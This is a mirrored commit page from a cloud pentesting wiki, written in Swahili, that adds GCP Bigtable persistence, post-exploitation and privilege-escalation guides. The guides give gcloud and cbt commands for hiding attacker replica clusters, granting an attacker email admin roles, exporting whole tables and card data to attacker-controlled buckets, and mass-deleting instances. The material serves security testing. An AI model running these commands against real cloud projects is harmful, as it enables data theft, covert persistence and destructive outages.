gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-09 14:20:48 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigta

Browse Source
This commit is contained in:
Translator
2025-11-19 14:47:50 +00:00
parent 2b5af604d7
commit b473b823fd
4 changed files with 501 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

52
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigtable-persistence.md Normal file
View File

@@ -0,0 +1,52 @@
# GCP - Bigtable Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
Kwa habari zaidi kuhusu Bigtable angalia:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
### App Profile ya mshambuliaji iliyotengwa
**Permissions:** `bigtable.appProfiles.create`, `bigtable.appProfiles.update`.
Unda app profile inayowelekeza trafiki kwa replica cluster yako na wezesha Data Boost ili usitegeme tena provisioned nodes ambazo watetezi wanaweza kugundua.
```bash
gcloud bigtable app-profiles create stealth-profile \
--instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
--row-affinity --description="internal batch"
gcloud bigtable app-profiles update stealth-profile \
--instance=<instance-id> --data-boost \
--data-boost-compute-billing-owner=HOST_PAYS
```
Iwapo tu wasifu huu utakuwepo unaweza kuunganishwa tena kwa kutumia vyeti vipya vinavyorejea kwake.
### Maintain your own replica cluster
**Ruhusa:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.
Sanidi klasta yenye idadi ndogo ya node katika eneo tulivu. Hata kama utambulisho za wateja zako zitapotea, **klasta inahifadhi nakala kamili ya kila jedwali** hadi watetezi waondoe waziwazi.
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1
```
Fuatilia kwa kutumia `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` ili uweze kuongeza uwezo mara moja unapohitaji kutoa data.
### Weka replication nyuma ya CMEK yako mwenyewe
**Ruhusa:** `bigtable.clusters.create`, `cloudkms.cryptoKeyVersions.useToEncrypt` kwenye attacker-owned key.
Leta KMS key yako unapoanzisha clone. Bila funguo hiyo, Google haiwezi kuunda tena au kufanya failover kwenye cluster, hivyo blue teams wanapaswa kuratibu nawe kabla ya kuigusa.
```bash
gcloud bigtable clusters create cmek-clone \
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
```
Zungusha au uzime funguo katika mradi wako ili mara moja kuiharibu replica (lakini bado ukiruhusiwa kuiwasha tena baadaye).
{{#include ../../../banners/hacktricks-training.md}}

252
src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-bigtable-post-exploitation.md Normal file
View File

@@ -0,0 +1,252 @@
# GCP - Bigtable Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
Kwa maelezo zaidi kuhusu Bigtable angalia:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
> [!TIP]
> Sakinisha CLI ya `cbt` mara moja kupitia Cloud SDK ili amri zilizo hapa chini zifanye kazi kwenye mashine yako:
>
> ```bash
> gcloud components install cbt
> ```
### Soma mistari
**Ruhusa:** `bigtable.tables.readRows`
`cbt` inakuja na Cloud SDK na inaweza kuwasiliana na admin/data APIs bila middleware yoyote. Elekeza `cbt` kwenye project/instance iliyovamiwa na tupa (dump) mistari moja kwa moja kutoka kwenye jedwali. Punguza skani ikiwa unahitaji tu kuangalia kwa haraka.
```bash
# Install cbt
gcloud components update
gcloud components install cbt
# Read entries with creds of gcloud
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
```
### Andika safu
**Ruhusa:** `bigtable.tables.mutateRows`, (utahitaji `bigtable.tables.readRows` kuthibitisha mabadiliko).
Tumia zana hiyo hiyo kufanya upsert ya seli zozote. Hii ndiyo njia ya haraka zaidi ya backdoor configs, drop web shells, au plant poisoned dataset rows.
```bash
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>
cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=@/tmp/stealme.bin
# Verify the injected row
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> rows=user#1337
```
`cbt set` inakubali raw bytes kupitia sintaksia ya `@/path`, hivyo unaweza kusukuma compiled payloads au serialized protobufs hasa jinsi services za downstream zinavyotarajia.
### Toa rows kwenye bucket yako
**Ruhusa:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
Inawezekana exfiltrate yaliyomo ya jedwali lote hadi bucket inayodhibitiwa na mshambuliaji kwa kuanzisha job ya Dataflow ambayo inatiririsha rows ndani ya GCS bucket unayodhibiti.
> [!NOTE]
> Kumbuka kwamba utahitaji ruhusa `iam.serviceAccounts.actAs` juu ya SA fulani yenye ruhusa za kutosha kufanya export (kwa default, ikiwa haitatajwa vinginevyo, default compute SA itatumika).
```bash
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
--project=<PROJECT> \
--region=<REGION> \
--parameters=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
--staging-location=gs://<BUCKET>/staging/
# Example
gcloud dataflow jobs run dump-bigtable3 \
--gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json \
--project=gcp-labs-3uis1xlx \
--region=us-central1 \
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/ \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
> [!NOTE]
> Badilisha kiolezo kuwa `Cloud_Bigtable_to_GCS_Parquet` au `Cloud_Bigtable_to_GCS_SequenceFile` ikiwa unataka matokeo ya Parquet/SequenceFile badala ya JSON. Ruhusa ni zile zile; njia ya kiolezo tu ndio inabadilika.
### Kuingiza safu
**Ruhusa:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
Inawezekana kuingiza yaliyomo ya jedwali zima kutoka kwenye bucket inayodhibitiwa na mshambulizi kwa kuanzisha job ya Dataflow inayotiririsha safu kwenye bucket ya GCS unayodhibiti. Kwa hili mshambulizi atalazimika kwanza kuunda faili ya parquet yenye data za kuingizwa na schema inayotarajiwa. Mshambulizi anaweza kwanza kusafirisha data kwa muundo wa parquet akifuata mbinu iliyotangulia na setting `Cloud_Bigtable_to_GCS_Parquet` na kisha kuongeza rekodi mpya kwenye faili ya parquet iliyopakuliwa
> [!NOTE]
> Kumbuka kwamba utahitaji ruhusa `iam.serviceAccounts.actAs` juu ya baadhi ya SA zenye ruhusa za kutosha kufanya export (kwa chaguo-msingi, ikiwa haijaonyeshwa vinginevyo, default compute SA itatumika).
```bash
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=<REGION> \
--gcs-location=gs://dataflow-templates-<REGION>/<VERSION>>/GCS_Parquet_to_Cloud_Bigtable \
--project=<PROJECT> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
--staging-location=gs://<BUCKET>/staging/
# Example
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=us-central1 \
--gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
--project=gcp-labs-3uis1xlx \
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
### Kurejesha chelezo
**Ruhusa:** `bigtable.backups.restore`, `bigtable.tables.create`.
Mshambuliaji mwenye ruhusa hizi anaweza kurejesha chelezo katika jedwali jipya chini ya udhibiti wake ili aweze kupata tena data nyeti za zamani.
```bash
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE> \
--cluster=<CLUSTER_ID_SOURCE>
gcloud bigtable instances tables restore \
--source=projects/<PROJECT_ID_SOURCE>/instances/<INSTANCE_ID_SOURCE>/clusters/<CLUSTER_ID>/backups/<BACKUP_ID> \
--async \
--destination=<TABLE_ID_NEW> \
--destination-instance=<INSTANCE_ID_DESTINATION> \
--project=<PROJECT_ID_DESTINATION>
```
### Undelete tables
**Ruhusa:** `bigtable.tables.undelete`
Bigtable inasaidia ufutaji wa muda (soft-deletion) kwa kipindi cha huruma (kwa kawaida siku 7 kwa chaguo-msingi). Katika dirisha hili, mshambuliaji mwenye ruhusa ya `bigtable.tables.undelete` anaweza kurejesha jedwali lililofutwa hivi karibuni na kupata tena data zake zote, na huenda akafikia taarifa nyeti ambazo zilidhaniwa zimeharibiwa.
Hii ni muhimu hasa kwa:
- Kupata tena data kutoka kwa jedwali zilizofutwa na walinzi wakati wa incident response
- Kupata data ya kihistoria ambayo ilifutwa kwa makusudi
- Kurejesha ufutaji wa bahati mbaya au wa uharibifu ili kudumisha persistence
```bash
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
--show-deleted
# Undelete a table within the retention period
gcloud bigtable instances tables undelete <table-id> \
--instance=<instance-id>
```
> [!NOTE]
> Operesheni ya undelete inafanya kazi tu ndani ya kipindi cha retention kilichowekwa (default 7 days). Baada dirisha hili la muda litakapomalizika, jedwali na data zake zitaondolewa kabisa na haiwezi kurejeshwa kupitia njia hii.
### Tengeneza Authorized Views
**Ruhusa:** `bigtable.authorizedViews.create`, `bigtable.tables.readRows`, `bigtable.tables.mutateRows`
Authorized views zinakuwezesha kuonyesha sehemu iliyochaguliwa ya jedwali. Badala ya kuzingatia least privilege, zitumie kuchapisha **hasa seti za safu/mstari zenye nyeti** unazozipenda na kuweka principal yako kwenye whitelist.
> [!WARNING]
> Tatizo ni kwamba ili kuunda authorized view pia unahitaji uwezo wa kusoma na kubadilisha mistari kwenye jedwali la msingi, kwa hivyo haupati ruhusa za ziada; kwa hiyo mbinu hii kwa kawaida haina matumizi.
```bash
cat <<'EOF' > /tmp/credit-cards.json
{
"subsetView": {
"rowPrefixes": ["acct#"],
"familySubsets": {
"pii": {
"qualifiers": ["cc_number", "cc_cvv"]
}
}
}
}
EOF
gcloud bigtable authorized-views create card-dump \
--instance=<instance-id> --table=<table-id> \
--definition-file=/tmp/credit-cards.json
gcloud bigtable authorized-views add-iam-policy-binding card-dump \
--instance=<instance-id> --table=<table-id> \
--member='user:<attacker@example.com>' --role='roles/bigtable.reader'
```
Kwa sababu upatikanaji umewekwa wigo kwa view, watetezi mara nyingi hawazingatii kwamba umeunda endpoint mpya nyeti sana.
### Soma Authorized Views
**Ruhusa:** `bigtable.authorizedViews.readRows`
Ikiwa una upatikanaji wa Authorized View, unaweza kusoma data kutoka kwake kwa kutumia Bigtable client libraries kwa kubainisha jina la authorized view katika maombi yako ya kusoma. Kumbuka kwamba authorized view kwa kawaida itazuia kile unachoweza kufikia kutoka kwenye jedwali. Hapa chini kuna mfano kwa kutumia Python:
```python
from google.cloud import bigtable
from google.cloud.bigtable_v2 import BigtableClient as DataClient
from google.cloud.bigtable_v2 import ReadRowsRequest
# Set your project, instance, table, view id
PROJECT_ID = "gcp-labs-3uis1xlx"
INSTANCE_ID = "avesc-20251118172913"
TABLE_ID = "prod-orders"
AUTHORIZED_VIEW_ID = "auth_view"
client = bigtable.Client(project=PROJECT_ID, admin=True)
instance = client.instance(INSTANCE_ID)
table = instance.table(TABLE_ID)
data_client = DataClient()
authorized_view_name = f"projects/{PROJECT_ID}/instances/{INSTANCE_ID}/tables/{TABLE_ID}/authorizedViews/{AUTHORIZED_VIEW_ID}"
request = ReadRowsRequest(
authorized_view_name=authorized_view_name
)
rows = data_client.read_rows(request=request)
for response in rows:
for chunk in response.chunks:
if chunk.row_key:
row_key = chunk.row_key.decode('utf-8') if isinstance(chunk.row_key, bytes) else chunk.row_key
print(f"Row: {row_key}")
if chunk.family_name:
family = chunk.family_name.value if hasattr(chunk.family_name, 'value') else chunk.family_name
qualifier = chunk.qualifier.value.decode('utf-8') if hasattr(chunk.qualifier, 'value') else chunk.qualifier.decode('utf-8')
value = chunk.value.decode('utf-8') if isinstance(chunk.value, bytes) else str(chunk.value)
print(f" {family}:{qualifier} = {value}")
```
### Denial of Service via Delete Operations
**Ruhusa:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`
Ruhusa zozote za Bigtable za kufuta zinaweza kutumiwa kama silaha kwa denial of service attacks. Mdukuzi mwenye ruhusa hizi anaweza kuvuruga shughuli kwa kufuta rasilimali muhimu za Bigtable:
- **`bigtable.appProfiles.delete`**: Futa profaili za programu, kuvunja muunganisho wa wateja na usanidi wa routing
- **`bigtable.authorizedViews.delete`**: Ondoa mitazamo iliyoruhusiwa, kukata njia halali za upatikanaji kwa programu
- **`bigtable.authorizedViews.deleteTagBinding`**: Ondoa binding za tag kutoka kwa mitazamo iliyoruhusiwa
- **`bigtable.backups.delete`**: Haribu snapshot za backup, kuondoa chaguzi za kurejesha baada ya maafa
- **`bigtable.clusters.delete`**: Futa klasta nzima, kusababisha kutokuwepo kwa data mara moja
- **`bigtable.instances.delete`**: Ondoa instances kamili za Bigtable, kufuta meza zote na usanidi
- **`bigtable.tables.delete`**: Futa meza binafsi, kusababisha hasara ya data na kushindwa kwa programu
```bash
# Delete a table
gcloud bigtable instances tables delete <table-id> \
--instance=<instance-id>
# Delete an authorized view
gcloud bigtable authorized-views delete <view-id> \
--instance=<instance-id> --table=<table-id>
# Delete a backup
gcloud bigtable backups delete <backup-id> \
--instance=<instance-id> --cluster=<cluster-id>
# Delete an app profile
gcloud bigtable app-profiles delete <profile-id> \
--instance=<instance-id>
# Delete a cluster
gcloud bigtable clusters delete <cluster-id> \
--instance=<instance-id>
# Delete an entire instance
gcloud bigtable instances delete <instance-id>
```
> [!WARNING]
> Operesheni za kufuta mara nyingi hufanyika mara moja na hazirudikiwi. Hakikisha kuna nakala za chelezo kabla ya kujaribu amri hizi, kwani zinaweza kusababisha upotevu wa data wa kudumu na usumbufu mkubwa wa huduma.
{{#include ../../../banners/hacktricks-training.md}}

106
src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigtable-privesc.md Normal file
View File

@@ -0,0 +1,106 @@
# GCP - Bigtable Privesc
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
Kwa taarifa zaidi kuhusu Bigtable angalia:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
### `bigtable.instances.setIamPolicy`
**Ruhusa:** `bigtable.instances.setIamPolicy` (na kawaida `bigtable.instances.getIamPolicy` kusoma current bindings).
Kumiliki sera ya IAM ya instance kunakuwezesha kujipa **`roles/bigtable.admin`** (au cheo maalum chochote) ambacho inasambaa kwa kila cluster, table, backup na authorized view katika instance.
```bash
gcloud bigtable instances add-iam-policy-binding <instance-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
> [!TIP]
> Ikiwa huwezi kuorodhesha bindings zilizopo, tengeneza waraka mpya wa sera na uiweke kwa `gcloud bigtable instances set-iam-policy` mradi tu unajiweka ndani yake.
Baada ya kupata ruhusa hizi, angalia katika [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) kwa mbinu zaidi za kutumia vibaya ruhusa za Bigtable.
### `bigtable.tables.setIamPolicy`
**Ruhusa:** `bigtable.tables.setIamPolicy` (optionally `bigtable.tables.getIamPolicy`).
Sera za instance zinaweza kufungwa wakati jedwali za kibinafsi zinapokelewa mamlaka. Ikiwa unaweza kuhariri table IAM, unaweza **kujipandisha kuwa mmiliki wa dataset lengwa** bila kuathiri workloads nyingine.
```bash
gcloud bigtable tables add-iam-policy-binding <table-id> \
--instance=<instance-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) techniques for more ways to abuse Bigtable permissions.
### `bigtable.backups.setIamPolicy`
**Ruhusa:** `bigtable.backups.setIamPolicy`
Backups zinaweza kurejeshwa kwenye **any instance in any project** unadhibiti. Kwanza, mpe identity yako access kwa backup, kisha uirestore ndani ya sandbox ambapo unashikilia Admin/Owner roles.
Kama una ruhusa `bigtable.backups.setIamPolicy` unaweza kujipa ruhusa `bigtable.backups.restore` kurejesha backups za zamani na kujaribu kupata taarifa nyeti.
```bash
# Take ownership of the snapshot
gcloud bigtable backups add-iam-policy-binding <backup-id> \
--instance=<instance-id> --cluster=<cluster-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
Baada ya kufanya ukaguzi huu wa ruhusa, tazama [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) ili kuona jinsi ya kurejesha chelezo.
### Sasisha authorized view
**Permissions:** `bigtable.authorizedViews.update`
Authorized Views zinakusudiwa kuficha safu/kolamu. Kuziyabadilisha au kuzifuta kunaondoa vizuizi vya usalama vya kina ambavyo watetezi wanategemea.
```bash
# Broaden the subset by uploading a permissive definition
gcloud bigtable authorized-views update <view-id> \
--instance=<instance-id> --table=<table-id> \
--definition-file=/tmp/permissive-view.json --ignore-warnings
# Json example not filtering any row or column
cat <<'EOF' > /tmp/permissive-view.json
{
"subsetView": {
"rowPrefixes": [""],
"familySubsets": {
"<SOME FAMILITY NAME USED IN THE CURRENT TABLE>": {
"qualifierPrefixes": [""]
}
}
}
}
EOF
# Describe the authorized view to get a family name
gcloud bigtable authorized-views describe <view-id> \
--instance=<instance-id> --table=<table-id>
```
Baada ya kupata ruhusa hii, tazama katika [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) ili kuona jinsi ya kusoma kutoka kwa Authorized View.
### `bigtable.authorizedViews.setIamPolicy`
**Ruhusa:** `bigtable.authorizedViews.setIamPolicy`.
Mshambuliaji akiwa na ruhusa hii anaweza kujipa ufikiaji wa Authorized View, ambayo inaweza kuwa na data nyeti ambazo wangekuwa hawapati vinginevyo.
```bash
# Give more permissions over an existing view
gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
--instance=<instance-id> --table=<table-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.viewer'
```
Baada ya kuwa na ukaguzi huu wa ruhusa katika [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) ili kuona jinsi ya kusoma kutoka kwa view iliyoruhusiwa.
{{#include ../../../banners/hacktricks-training.md}}

94
src/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md
View File

@@ -1,10 +1,71 @@
# GCP - Bigtable Enum
# GCP - Bigtable Uorodheshaji
{{#include ../../../banners/hacktricks-training.md}}
## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) <a href="#cloud-bigtable" id="cloud-bigtable"></a>
## Bigtable
Huduma ya hifadhidata ya NoSQL inayosimamiwa kikamilifu, inayoweza kupanuliwa kwa mzigo mkubwa wa uchambuzi na operesheni yenye upatikanaji wa hadi 99.999%. [Learn more](https://cloud.google.com/bigtable).
Google Cloud Bigtable ni hifadhidata ya NoSQL iliyosimamiwa kikamilifu na inayoweza kupanuka, iliyoundwa kwa programu zinazohitaji throughput ya juu sana na latency ya chini. Imejengwa kushughulikia kiasi kikubwa cha data — petabytes katika maelfu ya nodes — na bado kutoa utendaji wa kusoma na kuandika kwa haraka. Bigtable ni bora kwa mizigo ya kazi kama data za time-series, telemetri ya IoT, uchambuzi wa kifedha, engines za personalization, na hifadhidata kubwa za uendeshaji. Inatumia muundo wa hifadhi wa ramani isiyojazwa, iliyogawanywa, yenye vipimo vingi na iliyopangwa kwa kisarufi, jambo linalofanya iwe ya ufanisi kuhifadhi jedwali pana ambapo safu nyingi zinaweza kuwa tupu. [Learn more](https://cloud.google.com/bigtable).
### Hierarki
1. **Bigtable Instance**
Mfano wa Bigtable ni rasilimali ya ngazi ya juu unayoitengeneza.
Hauhifadhi data yenyewe — fikiria kama kontena la kimantiki linalounganisha clusters na tables zako.
Kuna aina mbili za instances:
- Development instance (single-node, nafuu, si kwa uzalishaji)
- Production instance (inaweza kuwa na clusters nyingi)
2. **Clusters**
Cluster ina rasilimali halisi za compute na storage zinazotumika kutumikia data ya Bigtable.
- Kila cluster iko katika region moja.
- Imetengenezwa kwa nodes, ambazo zinatoa CPU, RAM, na uwezo wa mtandao.
- Unaweza kuunda instances zenye clusters nyingi kwa ajili ya upatikanaji wa juu au kusoma/kuandika duniani kote.
- Data inarekebishwa (replicated) kiotomatiki kati ya clusters katika instance ileile.
Muhimu:
- Jedwali (Tables) zinamilikiwa na instance, si cluster maalum.
- Clusters hutoa tu rasilimali za kutumikia data.
3. **Tables**
Jedwali katika Bigtable ni sawa na jedwali katika hifadhidata za NoSQL:
- Data huhifadhiwa kwa safu, zinazo tambuliwa kwa row key.
- Kila safu ina familia za safu (column families), ambazo zina safu (columns).
- Ni isiyojazwa: seli tupu hazitumiwi nafasi.
- Bigtable huhifadhi data iliyopangwa kwa msanii wa lexicographic kwa row key.
Jedwali hutumikishwa na clusters zote ndani ya instance.
4. **Tablets (and Hot Tablets)**
Bigtable hugawanya kila jedwali katika sehemu za usawa zinazoitwa tablets. Tablet ni:
- Anuwai ya mfululizo wa row keys.
- Imehifadhiwa kwenye node moja kwa wakati fulani.
- Tablets hugawanywa, kuunganishwa, na kuhamishwa kiotomatiki na Bigtable.
Hot tablet hutokea wakati:
- Kusoma au kuandika nyingi zinafika katika eneo lile la row-key (tablet moja).
- Tablet/node husika inazidiwa mzigo.
- Hii husababisha hotspots (vizuizi vya utendakazi).
5. **Authorized Views**
Authorized views zinakuwezesha kuunda kundi ndogo la data ya jedwali ambalo linaweza kushirikiwa na watumiaji au programu maalum bila kuwapa ufikiaji wa jedwali lote. Hii ni muhimu kwa:
- Kuzuia ufikiaji wa data nyeti.
- Kutoa ufikiaji wa kusoma pekee kwa safu au safu maalum.
6. **App Profiles**
App profile ya Bigtable ni usanidi unaobainisha jinsi programu au mteja anavyopaswa kuingiliana na instance ya Bigtable, hasa katika mazingira yenye clusters nyingi. Inasimamia tabia ya routing — kama maombi yaelekezwe kwa cluster moja au kugawanywa kwa clusters nyingi kwa ajili ya upatikanaji wa juu — na inadhibiti jinsi maandishi yanavyorekebishwa, kuchagua kati ya synchronous (muingiliano thabiti zaidi) au asynchronous (latency ya chini) modes.
```bash
# Cloud Bigtable
gcloud bigtable instances list
@@ -15,6 +76,11 @@ gcloud bigtable instances get-iam-policy <instance>
gcloud bigtable clusters list
gcloud bigtable clusters describe <cluster>
## Tables
gcloud bigtable tables list --instance <INSTANCE>
gcloud bigtable tables describe --instance <INSTANCE> <TABLE>
gcloud bigtable tables get-iam-policy --instance <INSTANCE> <TABLE>
## Backups
gcloud bigtable backups list --instance <INSTANCE>
gcloud bigtable backups describe --instance <INSTANCE> <backupname>
@@ -26,5 +92,27 @@ gcloud bigtable hot-tablets list
## App Profiles
gcloud bigtable app-profiles list --instance <INSTANCE>
gcloud bigtable app-profiles describe --instance <INSTANCE> <app-prof>
## Authorized Views
gcloud bigtable authorized-views list --instance <INSTANCE> --table <TABLE>
gcloud bigtable authorized-views describe --instance <INSTANCE> --table <TABLE> <VIEW>
```
## Privilege Escalation
{{#ref}}
../gcp-privilege-escalation/gcp-bigtable-privesc.md
{{#endref}}
## Post Exploitation
{{#ref}}
../gcp-post-exploitation/gcp-bigtable-post-exploitation.md
{{#endref}}
## Persistence
{{#ref}}
../gcp-persistence/gcp-bigtable-persistence.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}